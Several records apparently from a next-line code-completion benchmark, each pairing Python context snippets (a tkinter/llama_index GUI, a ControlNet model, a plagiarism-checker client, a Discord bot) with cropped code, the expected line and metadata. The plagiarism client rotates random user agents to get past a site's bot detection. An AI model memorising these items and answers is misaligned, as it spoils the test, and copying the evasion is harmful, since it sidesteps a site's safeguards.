Properties.EMBEDDING_DEPLOYMENT:\n embedding_deployment = gui.settings_tab.embeddings_deployment_entry.get()\n if not embedding_deployment:\n messagebox.showerror(\"Error\", \"Please enter embedding deployment name in Settings Tab.\")\n return False\n case Properties.PROMPT:\n prompt = gui.settings_tab.prompt_entry.get(\"1.0\", tk.END)\n if not prompt:\n messagebox.showerror(\"Error\", \"Please enter a prompt in Settings Tab.\")\n return False\n case Properties.MAX_TOKENS:\n max_tokens = gui.settings_tab.max_tokens.get()\n if not max_tokens:\n messagebox.showerror(\"Error\", \"Please enter max tokens in Settings Tab.\")\n return False\n case Properties.TASK_REQUIREMENTS:\n task_requirements = gui.task_tab.task_requirements_entry.get(\"1.0\", tk.END)\n if not task_requirements:\n messagebox.showerror(\"Error\", \"Please enter a Task requirements.\")\n return False\n case Properties.SELECTED_PROJECT:\n selected_project = gui.task_tab.selected_project.get()\n if not selected_project:\n messagebox.showerror(\"Error\", \"Please select a project.\")\n return False\n case Properties.THREADS:\n threads = gui.settings_tab.threads.get()\n if not threads:\n messagebox.showerror(\"Error\", \"Please enter number of threads in Settings Tab.\")\n return False\n case Properties.REINDEX_PROJECT:\n reindex_project = gui.projects_tab.reindex_project.get()\n if not reindex_project:\n messagebox.showerror(\"Error\", \"Please select a project to 
reindex.\")\n return False\n return True"
},
{
"identifier": "init_llama_index",
"path": "gui/llama_index_init.py",
"snippet": "def init_llama_index(self, api_type):\n if self.isLlamaInitialized:\n return\n\n llm = None\n embed_model = None\n\n if api_type == \"azure\":\n is_valid = validate(self, [\n Properties.API_BASE,\n Properties.API_VERSION,\n Properties.API_KEY,\n Properties.GPT_MODEL,\n Properties.GPT_DEPLOYMENT,\n Properties.EMBEDDING_MODEL,\n Properties.EMBEDDING_DEPLOYMENT,\n ])\n if not is_valid:\n return\n\n api_base = self.settings_tab.api_host_entry.get()\n api_version = self.settings_tab.api_version_entry.get()\n api_key = self.settings_tab.api_key_entry.get()\n gpt_model_name = self.settings_tab.gpt_model.get()\n gpt_deployment_name = self.settings_tab.gpt_deployment.get()\n embedding_model_name = self.settings_tab.embeddings_model_entry.get()\n embedding_deployment_name = self.settings_tab.embeddings_deployment_entry.get()\n\n llm = AzureOpenAI(\n deployment_name=gpt_deployment_name,\n model=gpt_model_name,\n api_key=api_key,\n azure_endpoint=api_base,\n api_version=api_version\n )\n\n embed_model = AzureOpenAIEmbedding(\n model=embedding_model_name,\n deployment_name=embedding_deployment_name,\n api_key=api_key,\n azure_endpoint=api_base,\n api_version=api_version,\n )\n\n if api_type == \"openai\":\n is_valid = validate(self, [\n Properties.API_KEY,\n Properties.GPT_MODEL,\n Properties.EMBEDDING_MODEL,\n ])\n if not is_valid:\n return\n\n api_key = self.settings_tab.api_key_entry.get()\n gpt_model_name = self.settings_tab.gpt_model.get()\n embedding_model_name = self.settings_tab.embeddings_model_entry.get()\n\n llm = OpenAI(\n model=gpt_model_name,\n api_key=api_key\n )\n embed_model = OpenAIEmbedding(\n model=embedding_model_name,\n api_key=api_key,\n )\n\n if api_type == \"gemini\":\n is_valid = validate(self, [\n Properties.API_KEY,\n Properties.GPT_MODEL,\n Properties.EMBEDDING_MODEL,\n ])\n if not is_valid:\n return\n\n api_key = self.settings_tab.api_key_entry.get()\n gpt_model_name = self.settings_tab.gpt_model.get()\n embedding_model_name = self.settings_tab.embeddings_model_entry.get()\n\n llm = Gemini(\n model_name=gpt_model_name,\n api_key=api_key\n )\n embed_model = GeminiEmbedding(\n model_name=embedding_model_name,\n api_key=api_key,\n )\n\n if not llm or not embed_model:\n messagebox.showerror(\"Error\", \"Error occurred while initializing llama_index.\")\n return\n\n self.service_context = ServiceContext.from_defaults(\n llm=llm,\n embed_model=embed_model,\n )\n\n set_global_service_context(self.service_context)\n self.isLlamaInitialized = True"
},
{
"identifier": "question",
"path": "helpers/question.py",
"snippet": "def question(\n selected_project,\n task,\n is_new_chat,\n max_tokens,\n gui\n):\n # parse project name and project directory\n selected_project = selected_project.split(\" | \")\n project_name = selected_project[0]\n project_dir = selected_project[1]\n\n if is_new_chat:\n encoding = tiktoken.get_encoding(\"cl100k_base\")\n\n # rebuild storage context\n storage_context = StorageContext.from_defaults(persist_dir=\"./storage\")\n\n # load index\n index = load_index_from_storage(storage_context, project_name)\n retriever = index.as_retriever(similarity_top_k=25)\n\n # retrieve relevant documents\n nodes = retriever.retrieve(task)\n\n # add file structure to prompt:\n f = open(project_name + \"/project_files_structure.txt\", \"r\")\n system_message = \"Project file structure:\\n\\n\" + f.read() + \"\\n\\n\"\n\n # count tokens\n num_tokens = len(encoding.encode(task))\n # if chat is not new, then Project file structure is already inside messages\n if is_new_chat:\n num_tokens += len(encoding.encode(system_message))\n num_tokens += 5000 # add 5000 tokens wiggleroom for responses\n for message in gui.messages:\n num_tokens += len(encoding.encode(str(message)))\n\n # iterate over documents that were the best matches\n for node in nodes:\n file_name = node.metadata['file_name'][:-4].replace(\"___\", \"/\")\n\n # skip files that are not in project directory\n if file_name == \"project_files_structure\" or file_name == \"git_commit_hash\"\\\n or file_name == \"ignored_files\" or file_name == \"ignored_directories\":\n continue\n\n file_path = project_dir + \"/\" + file_name\n # open file and read contents\n with open(file_path, 'r') as file:\n file_contents = file.read()\n tokens = len(encoding.encode(file_contents))\n\n # stop adding files to context if max_tokens is reached\n if num_tokens + tokens > int(max_tokens):\n break\n\n num_tokens += tokens\n system_message += file_name + \":\\n'''\\n\" + file_contents + \"\\n'''\\n\"\n\n # ad task description to messages:\n gui.messages.append(\n ChatMessage(role=\"system\", content=system_message)\n )\n\n # ad task description to messages:\n gui.messages.append(\n ChatMessage(role=\"user\", content=task)\n )\n\n response = get_response(gui, gui.messages)\n\n gui.messages.append(response)\n\n gui.task_tab.loading_frame.place_forget()\n gui.task_tab.generation_response_frame.place(y=380, x=0, relwidth=1, height=900)\n gui.task_tab.load_web_page()\n return"
}
] | import os
import sys
import tempfile
import threading
import tkinter as tk
from tkinter import ttk, scrolledtext, messagebox
from llama_index.llms import ChatMessage
from gui.input_validator import Properties, validate
from gui.llama_index_init import init_llama_index
from helpers.question import question
from tkinterweb import HtmlFrame | 2,939 |
class TaskTab:
def __init__(self, root, frame):
self.frame = frame
self.root = root
# Task Requirements
ttk.Label(frame, text="Task Requirements:", style='W.Label').pack(fill=tk.X, padx=10, pady=(12, 2))
self.task_requirements_entry = scrolledtext.ScrolledText(frame, wrap=tk.WORD, height=7)
self.task_requirements_entry.configure(state='normal')
self.task_requirements_entry.pack(fill=tk.X, padx=10, pady=10)
# Select project
ttk.Label(frame, text="Selected Project:", style='W.Label').pack(fill=tk.X, padx=10, pady=2)
self.selected_project = ttk.Combobox(frame)
self.selected_project.pack(fill=tk.X, padx=10, pady=10)
# Run Generation Button
self.run_generation_button = ttk.Button(frame, text="Generate", command=self.generate_answer)
self.run_generation_button.pack(padx=10, pady=10)
# Clear chat Button
self.run_generation_button = ttk.Button(frame, text="Clear chat", command=self.clear_chat)
self.run_generation_button.pack(padx=10, pady=10)
# Generation Response Field
self.generation_response_frame = ttk.Frame(self.frame)
self.generation_response = HtmlFrame(self.generation_response_frame)
# Loading screen
self.loading_frame = ttk.Frame(self.frame)
self.loader = HtmlFrame(self.loading_frame)
self.load_loading_page()
def clear_chat(self):
self.root.messages = []
self.load_web_page()
def generate_answer(self):
|
class TaskTab:
def __init__(self, root, frame):
self.frame = frame
self.root = root
# Task Requirements
ttk.Label(frame, text="Task Requirements:", style='W.Label').pack(fill=tk.X, padx=10, pady=(12, 2))
self.task_requirements_entry = scrolledtext.ScrolledText(frame, wrap=tk.WORD, height=7)
self.task_requirements_entry.configure(state='normal')
self.task_requirements_entry.pack(fill=tk.X, padx=10, pady=10)
# Select project
ttk.Label(frame, text="Selected Project:", style='W.Label').pack(fill=tk.X, padx=10, pady=2)
self.selected_project = ttk.Combobox(frame)
self.selected_project.pack(fill=tk.X, padx=10, pady=10)
# Run Generation Button
self.run_generation_button = ttk.Button(frame, text="Generate", command=self.generate_answer)
self.run_generation_button.pack(padx=10, pady=10)
# Clear chat Button
self.run_generation_button = ttk.Button(frame, text="Clear chat", command=self.clear_chat)
self.run_generation_button.pack(padx=10, pady=10)
# Generation Response Field
self.generation_response_frame = ttk.Frame(self.frame)
self.generation_response = HtmlFrame(self.generation_response_frame)
# Loading screen
self.loading_frame = ttk.Frame(self.frame)
self.loader = HtmlFrame(self.loading_frame)
self.load_loading_page()
def clear_chat(self):
self.root.messages = []
self.load_web_page()
def generate_answer(self): | is_valid = validate(self.root, [ | 1 | 2023-12-15 14:06:38+00:00 | 4k |
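The question() helper in the Amigo record above packs retrieved files into the prompt until a token budget is hit. A small stand-alone sketch of that budgeting idea with tiktoken follows; the file names, contents and budget are invented.

import tiktoken

encoding = tiktoken.get_encoding("cl100k_base")
max_tokens = 50
budget_used = len(encoding.encode("Task: add a clear-chat button"))

files = {"gui/tab_task.py": "class TaskTab: ...", "main.py": "class Bot: ..."}
context = ""
for name, contents in files.items():
    cost = len(encoding.encode(contents))
    if budget_used + cost > max_tokens:
        break  # stop adding files once the prompt budget is exhausted
    budget_used += cost
    context += f"{name}:\n'''\n{contents}\n'''\n"

print(budget_used, len(context))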
quocanh34/magic-animate-modified | magicanimate/models/controlnet.py | [
{
"identifier": "TimestepEmbedding",
"path": "magicanimate/models/embeddings.py",
"snippet": "class TimestepEmbedding(nn.Module):\n def __init__(\n self,\n in_channels: int,\n time_embed_dim: int,\n act_fn: str = \"silu\",\n out_dim: int = None,\n post_act_fn: Optional[str] = None,\n cond_proj_dim=None,\n ):\n super().__init__()\n\n self.linear_1 = nn.Linear(in_channels, time_embed_dim)\n\n if cond_proj_dim is not None:\n self.cond_proj = nn.Linear(cond_proj_dim, in_channels, bias=False)\n else:\n self.cond_proj = None\n\n if act_fn == \"silu\":\n self.act = nn.SiLU()\n elif act_fn == \"mish\":\n self.act = nn.Mish()\n elif act_fn == \"gelu\":\n self.act = nn.GELU()\n else:\n raise ValueError(f\"{act_fn} does not exist. Make sure to define one of 'silu', 'mish', or 'gelu'\")\n\n if out_dim is not None:\n time_embed_dim_out = out_dim\n else:\n time_embed_dim_out = time_embed_dim\n self.linear_2 = nn.Linear(time_embed_dim, time_embed_dim_out)\n\n if post_act_fn is None:\n self.post_act = None\n elif post_act_fn == \"silu\":\n self.post_act = nn.SiLU()\n elif post_act_fn == \"mish\":\n self.post_act = nn.Mish()\n elif post_act_fn == \"gelu\":\n self.post_act = nn.GELU()\n else:\n raise ValueError(f\"{post_act_fn} does not exist. Make sure to define one of 'silu', 'mish', or 'gelu'\")\n\n def forward(self, sample, condition=None):\n if condition is not None:\n sample = sample + self.cond_proj(condition)\n sample = self.linear_1(sample)\n\n if self.act is not None:\n sample = self.act(sample)\n\n sample = self.linear_2(sample)\n\n if self.post_act is not None:\n sample = self.post_act(sample)\n return sample"
},
{
"identifier": "Timesteps",
"path": "magicanimate/models/embeddings.py",
"snippet": "class Timesteps(nn.Module):\n def __init__(self, num_channels: int, flip_sin_to_cos: bool, downscale_freq_shift: float):\n super().__init__()\n self.num_channels = num_channels\n self.flip_sin_to_cos = flip_sin_to_cos\n self.downscale_freq_shift = downscale_freq_shift\n\n def forward(self, timesteps):\n t_emb = get_timestep_embedding(\n timesteps,\n self.num_channels,\n flip_sin_to_cos=self.flip_sin_to_cos,\n downscale_freq_shift=self.downscale_freq_shift,\n )\n return t_emb"
}
] | from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple, Union
from torch import nn
from torch.nn import functional as F
from diffusers.configuration_utils import ConfigMixin, register_to_config
from diffusers.utils import BaseOutput, logging
from .embeddings import TimestepEmbedding, Timesteps
from diffusers.models.modeling_utils import ModelMixin
from diffusers.models.unet_2d_blocks import (
CrossAttnDownBlock2D,
DownBlock2D,
UNetMidBlock2DCrossAttn,
get_down_block,
)
from diffusers.models.unet_2d_condition import UNet2DConditionModel
import torch | 2,195 |
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
@dataclass
class ControlNetOutput(BaseOutput):
down_block_res_samples: Tuple[torch.Tensor]
mid_block_res_sample: torch.Tensor
class ControlNetConditioningEmbedding(nn.Module):
"""
Quoting from https://arxiv.org/abs/2302.05543: "Stable Diffusion uses a pre-processing method similar to VQ-GAN
[11] to convert the entire dataset of 512 × 512 images into smaller 64 × 64 “latent images” for stabilized
training. This requires ControlNets to convert image-based conditions to 64 × 64 feature space to match the
convolution size. We use a tiny network E(·) of four convolution layers with 4 × 4 kernels and 2 × 2 strides
(activated by ReLU, channels are 16, 32, 64, 128, initialized with Gaussian weights, trained jointly with the full
model) to encode image-space conditions ... into feature maps ..."
"""
def __init__(
self,
conditioning_embedding_channels: int,
conditioning_channels: int = 3,
block_out_channels: Tuple[int] = (16, 32, 96, 256),
):
super().__init__()
self.conv_in = nn.Conv2d(conditioning_channels, block_out_channels[0], kernel_size=3, padding=1)
self.blocks = nn.ModuleList([])
for i in range(len(block_out_channels) - 1):
channel_in = block_out_channels[i]
channel_out = block_out_channels[i + 1]
self.blocks.append(nn.Conv2d(channel_in, channel_in, kernel_size=3, padding=1))
self.blocks.append(nn.Conv2d(channel_in, channel_out, kernel_size=3, padding=1, stride=2))
self.conv_out = zero_module(
nn.Conv2d(block_out_channels[-1], conditioning_embedding_channels, kernel_size=3, padding=1)
)
def forward(self, conditioning):
embedding = self.conv_in(conditioning)
embedding = F.silu(embedding)
for block in self.blocks:
embedding = block(embedding)
embedding = F.silu(embedding)
embedding = self.conv_out(embedding)
return embedding
class ControlNetModel(ModelMixin, ConfigMixin):
_supports_gradient_checkpointing = True
@register_to_config
def __init__(
self,
in_channels: int = 4,
flip_sin_to_cos: bool = True,
freq_shift: int = 0,
down_block_types: Tuple[str] = (
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"DownBlock2D",
),
only_cross_attention: Union[bool, Tuple[bool]] = False,
block_out_channels: Tuple[int] = (320, 640, 1280, 1280),
layers_per_block: int = 2,
downsample_padding: int = 1,
mid_block_scale_factor: float = 1,
act_fn: str = "silu",
norm_num_groups: Optional[int] = 32,
norm_eps: float = 1e-5,
cross_attention_dim: int = 1280,
attention_head_dim: Union[int, Tuple[int]] = 8,
use_linear_projection: bool = False,
class_embed_type: Optional[str] = None,
num_class_embeds: Optional[int] = None,
upcast_attention: bool = False,
resnet_time_scale_shift: str = "default",
projection_class_embeddings_input_dim: Optional[int] = None,
controlnet_conditioning_channel_order: str = "rgb",
conditioning_embedding_out_channels: Optional[Tuple[int]] = (16, 32, 96, 256),
):
super().__init__()
# Check inputs
if len(block_out_channels) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `block_out_channels` as `down_block_types`. `block_out_channels`: {block_out_channels}. `down_block_types`: {down_block_types}."
)
if not isinstance(only_cross_attention, bool) and len(only_cross_attention) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `only_cross_attention` as `down_block_types`. `only_cross_attention`: {only_cross_attention}. `down_block_types`: {down_block_types}."
)
if not isinstance(attention_head_dim, int) and len(attention_head_dim) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `attention_head_dim` as `down_block_types`. `attention_head_dim`: {attention_head_dim}. `down_block_types`: {down_block_types}."
)
# input
conv_in_kernel = 3
conv_in_padding = (conv_in_kernel - 1) // 2
self.conv_in = nn.Conv2d(
in_channels, block_out_channels[0], kernel_size=conv_in_kernel, padding=conv_in_padding
)
# time
time_embed_dim = block_out_channels[0] * 4
self.time_proj = Timesteps(block_out_channels[0], flip_sin_to_cos, freq_shift)
timestep_input_dim = block_out_channels[0]
| # *************************************************************************
# This file may have been modified by Bytedance Inc. (“Bytedance Inc.'s Mo-
# difications”). All Bytedance Inc.'s Modifications are Copyright (2023) B-
# ytedance Inc..
# *************************************************************************
# Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
@dataclass
class ControlNetOutput(BaseOutput):
down_block_res_samples: Tuple[torch.Tensor]
mid_block_res_sample: torch.Tensor
class ControlNetConditioningEmbedding(nn.Module):
"""
Quoting from https://arxiv.org/abs/2302.05543: "Stable Diffusion uses a pre-processing method similar to VQ-GAN
[11] to convert the entire dataset of 512 × 512 images into smaller 64 × 64 “latent images” for stabilized
training. This requires ControlNets to convert image-based conditions to 64 × 64 feature space to match the
convolution size. We use a tiny network E(·) of four convolution layers with 4 × 4 kernels and 2 × 2 strides
(activated by ReLU, channels are 16, 32, 64, 128, initialized with Gaussian weights, trained jointly with the full
model) to encode image-space conditions ... into feature maps ..."
"""
def __init__(
self,
conditioning_embedding_channels: int,
conditioning_channels: int = 3,
block_out_channels: Tuple[int] = (16, 32, 96, 256),
):
super().__init__()
self.conv_in = nn.Conv2d(conditioning_channels, block_out_channels[0], kernel_size=3, padding=1)
self.blocks = nn.ModuleList([])
for i in range(len(block_out_channels) - 1):
channel_in = block_out_channels[i]
channel_out = block_out_channels[i + 1]
self.blocks.append(nn.Conv2d(channel_in, channel_in, kernel_size=3, padding=1))
self.blocks.append(nn.Conv2d(channel_in, channel_out, kernel_size=3, padding=1, stride=2))
self.conv_out = zero_module(
nn.Conv2d(block_out_channels[-1], conditioning_embedding_channels, kernel_size=3, padding=1)
)
def forward(self, conditioning):
embedding = self.conv_in(conditioning)
embedding = F.silu(embedding)
for block in self.blocks:
embedding = block(embedding)
embedding = F.silu(embedding)
embedding = self.conv_out(embedding)
return embedding
class ControlNetModel(ModelMixin, ConfigMixin):
_supports_gradient_checkpointing = True
@register_to_config
def __init__(
self,
in_channels: int = 4,
flip_sin_to_cos: bool = True,
freq_shift: int = 0,
down_block_types: Tuple[str] = (
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"DownBlock2D",
),
only_cross_attention: Union[bool, Tuple[bool]] = False,
block_out_channels: Tuple[int] = (320, 640, 1280, 1280),
layers_per_block: int = 2,
downsample_padding: int = 1,
mid_block_scale_factor: float = 1,
act_fn: str = "silu",
norm_num_groups: Optional[int] = 32,
norm_eps: float = 1e-5,
cross_attention_dim: int = 1280,
attention_head_dim: Union[int, Tuple[int]] = 8,
use_linear_projection: bool = False,
class_embed_type: Optional[str] = None,
num_class_embeds: Optional[int] = None,
upcast_attention: bool = False,
resnet_time_scale_shift: str = "default",
projection_class_embeddings_input_dim: Optional[int] = None,
controlnet_conditioning_channel_order: str = "rgb",
conditioning_embedding_out_channels: Optional[Tuple[int]] = (16, 32, 96, 256),
):
super().__init__()
# Check inputs
if len(block_out_channels) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `block_out_channels` as `down_block_types`. `block_out_channels`: {block_out_channels}. `down_block_types`: {down_block_types}."
)
if not isinstance(only_cross_attention, bool) and len(only_cross_attention) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `only_cross_attention` as `down_block_types`. `only_cross_attention`: {only_cross_attention}. `down_block_types`: {down_block_types}."
)
if not isinstance(attention_head_dim, int) and len(attention_head_dim) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `attention_head_dim` as `down_block_types`. `attention_head_dim`: {attention_head_dim}. `down_block_types`: {down_block_types}."
)
# input
conv_in_kernel = 3
conv_in_padding = (conv_in_kernel - 1) // 2
self.conv_in = nn.Conv2d(
in_channels, block_out_channels[0], kernel_size=conv_in_kernel, padding=conv_in_padding
)
# time
time_embed_dim = block_out_channels[0] * 4
self.time_proj = Timesteps(block_out_channels[0], flip_sin_to_cos, freq_shift)
timestep_input_dim = block_out_channels[0]
| self.time_embedding = TimestepEmbedding( | 0 | 2023-12-15 01:22:37+00:00 | 4k |
KR1470R/plagiator-py | main.py | [
{
"identifier": "exists",
"path": "utils/exists.py",
"snippet": "def exists(obj, *keys):\n format_keys = \"\".join(\n list(map(\n lambda key: f\"['{key}']\",\n keys\n ))\n )\n try:\n return eval(f\"obj{format_keys}\")\n except Exception:\n return None"
},
{
"identifier": "Plagiator",
"path": "utils/plagiator.py",
"snippet": "class Plagiator:\n def __init__(self):\n self.session = requests.Session()\n adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)\n self.session.mount(\"https://\", adapter)\n software_names = [software_name.value for software_name in SoftwareName]\n operating_systems = [operating_system.value for operating_system in OperatingSystem]\n self.user_agent_rotator = UserAgent(\n software_names=software_names, \n operating_systems=operating_systems, \n limit=1000\n )\n\n def concretize_response(self, response: dict):\n if exists(response, \"error\") and response[\"error\"]:\n return response\n del response[\"error\"]\n del response[\"error_code\"]\n if len(response[\"title\"]) == 0:\n del response[\"title\"]\n words = response[\"text\"].split(\" \")\n if exists(response, \"highlight\") and len(response[\"highlight\"]):\n highlight_text = []\n for span in response[\"highlight\"]:\n span = list(map(int, span))\n selected_words = words[span[0]] if (\n span[0] == span[1]\n ) else words[span[0]:span[1]]\n if isinstance(selected_words, list):\n selected_words = \" \".join(selected_words)\n highlight_text.append(selected_words)\n response[\"highlight\"] = highlight_text\n if exists(response, \"matches\") and len(response[\"matches\"]):\n matches_highlight = []\n for match in response[\"matches\"]:\n matched_highlight_text = []\n for match_span in match[\"highlight\"]:\n match_span = list(map(int, match_span))\n selected_words = words[match_span[0]] if (\n match_span[0] == match_span[1]\n ) else words[match_span[0]:match_span[1]]\n if isinstance(selected_words, list):\n selected_words = \" \".join(selected_words)\n matched_highlight_text.append(selected_words)\n matches_highlight.append({**match, \"highlight\": matched_highlight_text})\n response[\"matches\"] = matches_highlight\n return response\n\n def __request__(self, text: str, title: str = None):\n return self.session.post(\n API_URI, \n headers={\n **HEADERS,\n \"User-Agent\": self.user_agent_rotator.get_random_user_agent()\n },\n params={\n \"is_free\": \"true\",\n \"plagchecker_locale\": \"ua\",\n \"title\": title or \"\",\n \"text\": text\n }\n )\n\n def process(self, text: str, title: str = None):\n try:\n api_response = self.__request__(text, title)\n api_response.raise_for_status()\n jsonify = json.loads(api_response.content.decode(\"unicode-escape\"))\n error_code = jsonify[\"error_code\"]\n if error_code and int(error_code) > 0:\n if exists(jsonify, \"error\"):\n message = jsonify[\"error\"]\n elif exists(jsonify, \"message\"):\n message = jsonify[\"message\"]\n else: message = \"\"\n logging.warning(\n f\"REQUEST RETURNED ERROR WITH STATUS {error_code}: \" +\\\n f\"{message}\\n\" +\\\n f\"{text}\"\n )\n except Exception as err:\n skip_err_msg = \"The action you just performed triggered the security solution.\"\n if skip_err_msg in api_response.decode():\n return\n logging.error(f\"REQUEST ERROR: {repr(err)}:{api_response.content}\")\n try:\n return {\"error\": api_response.content.decode()}\n except Exception:\n return {\"error\": \"something went wrong\"}\n return self.concretize_response(jsonify)"
},
{
"identifier": "split_chunks",
"path": "utils/split_chunks.py",
"snippet": "def split_chunks(text:str, words_per_chunk: int = 100):\n words = text.split(\" \")\n logging.info(f\"Words counted: {len(words)}\")\n logging.info(f\"Words per chunk: {words_per_chunk}\")\n chunks = []\n\n if len(words) <= words_per_chunk:\n chunks.append[words]\n else:\n while len(words):\n current_words_len = len(words)\n if current_words_len <= words_per_chunk:\n chunks.append(\" \".join(words[0:current_words_len]))\n del words[0:current_words_len]\n else:\n chunks.append(\" \".join(words[0:words_per_chunk]))\n del words[0:words_per_chunk]\n\n logging.info(f\"Splitted into {len(chunks)} chunks\")\n\n return chunks"
},
{
"identifier": "DocumentParser",
"path": "utils/document_parser.py",
"snippet": "class DocumentParser:\n def __init__(self):\n pass\n\n def extract_data(self, filepath):\n try:\n extension = Path(filepath).suffix\n extract_method = self.__ext_binds__(extension)\n result = self.__normilize__(extract_method(filepath))\n if result is None:\n raise Exception(\n f\"cannot extract text from '{file.actual_path}' - returned 'None'\"\n )\n return result\n except Exception as err:\n raise Exception(\n f\"extraction error: {err}\"\n )\n\n def __ext_binds__(self, ext):\n binds = {\n \".pdf\": self.__extract_text_from_pdf__,\n \".docx\": self.__extract_text_from_docx__,\n \".doc\": self.__extract_text_from_doc__,\n \".txt\": self.__extract_text_from_txt__\n }\n if ext not in binds:\n raise Exception(f\"Unsupportable document type: '{ext}'\")\n return binds[ext]\n\n def __normilize__(self, text):\n try:\n return normalize(\n \"NFKC\", \n re.sub(\n \"\\u0000\", \n \"\", \n re.sub(\n \"\\s+|\\n+\",\n \" \",\n re.sub(\"\\.+\", \" \", text)\n )\n )\n )\n except Exception as err:\n raise Exception(f\"normalization error: {repr(err)}\")\n\n def __extract_text_from_doc__(self, doc_path):\n try:\n return textract.process(doc_path).decode('utf-8')\n except KeyError:\n return None\n\n def __extract_text_from_docx__(self, docx_path):\n try:\n temp = docx2txt.process(docx_path)\n text = [line.replace('\\t', ' ') for line in temp.split('\\n') if line]\n return ' '.join(text)\n except KeyError:\n return None\n\n def __extract_text_from_pdf__(self, pdf_path: str):\n try:\n reader = PdfReader(pdf_path)\n number_of_pages = len(reader.pages)\n text = \"\"\n page = reader.pages[0]\n for page in reader.pages:\n text += page.extract_text()\n return text\n except Exception:\n return None\n\n def __extract_text_from_txt__(self, txt_path):\n try:\n with open(txt_path, \"r\") as f:\n return \"\\n\".join(str(i) for i in f.readlines())\n except Exception:\n return None"
}
] | import sys
import json
import dotenv
import logging
import concurrent.futures
from time import sleep
from random import randint
from utils.exists import exists
from os import getenv, path, curdir, mkdir
from utils.plagiator import Plagiator
from utils.split_chunks import split_chunks
from utils.document_parser import DocumentParser | 1,978 |
dotenv.load_dotenv(path.abspath(path.join(
curdir, "configs", ".env"
)))
logging.basicConfig(level=logging.INFO)
try:
docpath_arg = sys.argv[1]
except Exception:
docpath_arg = None
document_path = docpath_arg or getenv("DOC_PATH") or input(
"""
Enter absolute path to your document
Supported formats:
- .doc
- .docx
- .pdf
- .txt
-> """
)
words_per_chunk = int(getenv("WORDS_PER_CHUNK") or 100)
result_target_filename = path.basename(document_path).split(".")[0] + ".json"
result_folder = path.join(curdir, "results")
|
dotenv.load_dotenv(path.abspath(path.join(
curdir, "configs", ".env"
)))
logging.basicConfig(level=logging.INFO)
try:
docpath_arg = sys.argv[1]
except Exception:
docpath_arg = None
document_path = docpath_arg or getenv("DOC_PATH") or input(
"""
Enter absolute path to your document
Supported formats:
- .doc
- .docx
- .pdf
- .txt
-> """
)
words_per_chunk = int(getenv("WORDS_PER_CHUNK") or 100)
result_target_filename = path.basename(document_path).split(".")[0] + ".json"
result_folder = path.join(curdir, "results") | if not path.exists(result_folder): | 0 | 2023-12-21 17:29:18+00:00 | 4k |
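The plagiator record above splits extracted document text into fixed-size word chunks before checking them; a compact sketch of that splitting step is shown here with an arbitrary chunk size and sample sentence.

def split_chunks(text: str, words_per_chunk: int = 5):
    # group consecutive words into chunks of at most words_per_chunk
    words = text.split(" ")
    return [" ".join(words[i:i + words_per_chunk])
            for i in range(0, len(words), words_per_chunk)]

sample = "one two three four five six seven eight nine ten eleven"
for chunk in split_chunks(sample):
    print(chunk)  # three chunks: 5, 5 and 1 words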
fmhy/bot | cogs/events.py | [
{
"identifier": "channel_ids",
"path": "cogs/_config.py",
"snippet": "TOKEN = os.getenv(\"TOKEN\", None)\nGUILD_ID = os.getenv(\"GUILD_ID\", None)\nOWNERS = os.getenv(\"OWNERS\").split(\",\")\nRSS_CHANNELS = os.getenv(\"RSS_CHANNEL_IDS\", None)\nFEEDS = os.getenv(\"RSS_FEED_URLS\", None)\nDB = os.getenv(\"db_uri\")\n OWNERS: list[str]\n FEEDS: str\n RSS_CHANNELS: str\n TOKEN: str"
},
{
"identifier": "cembed",
"path": "cogs/_helpers.py",
"snippet": "def cembed(title, description, **kwargs):\n return discord.Embed(\n title=title,\n description=description,\n color=discord.Color.green(),\n timestamp=datetime.now(),\n **kwargs,\n )"
},
{
"identifier": "Bot",
"path": "main.py",
"snippet": "class Bot(commands.Bot):\n def __init__(self) -> None:\n self.start_time = datetime.datetime.now(datetime.UTC)\n intents = discord.Intents.all()\n\n super().__init__(\n command_prefix=commands.when_mentioned_or(prefix),\n intents=intents,\n help_command=help.HelpMenu(),\n case_insensitive=True,\n )\n\n self.session: aiohttp.ClientSession\n formatter.install(\"discord\", \"INFO\")\n formatter.install(\"bot\", \"INFO\")\n self.logger = logging.getLogger(\"discord\")\n self.logger = logging.getLogger(\"bot\")\n\n async def setup_hook(self):\n await self.load_extension(\"jishaku\")\n await self.load_cogs()\n\n async def load_cogs(self):\n s = time.perf_counter()\n for file in os.listdir(\"cogs/\"):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n extension = f\"cogs.{file[:-3]}\"\n try:\n await self.load_extension(extension)\n self.logger.info(f\"Loaded - {extension}\")\n except Exception as e:\n exception = f\"{type(e).__name__}: {e}\"\n self.logger.exception(\n f\"Failed to load extension {extension}. - {exception}\")\n traceback.print_exc()\n\n elapsed = time.perf_counter() - s\n self.logger.info(f\"Loaded all extensions - took {elapsed:.2f}s\")\n\n async def is_owner(self, user: discord.abc.User):\n if user.id in OWNERS:\n return True\n # Else fall back to the original\n return await super().is_owner(user)\n\n async def on_ready(self) -> None:\n self.session = aiohttp.ClientSession(loop=self.loop)\n await self.change_presence(activity=discord.Game(name=\"Free Media Heck Yeah\"))\n self.logger.info(\"Bot is ready!\")"
}
] | import re
import time
import discord
from datetime import datetime
from discord.ext import commands, tasks
from cogs._config import channel_ids, managing_roles, url_regex, auto_thread_channels, auto_thread_roles
from cogs._helpers import cembed
from main import Bot | 1,861 |
return duplicate_links, non_duplicate_links
@commands.Cog.listener()
async def on_ready(self):
self.update_single_page.start()
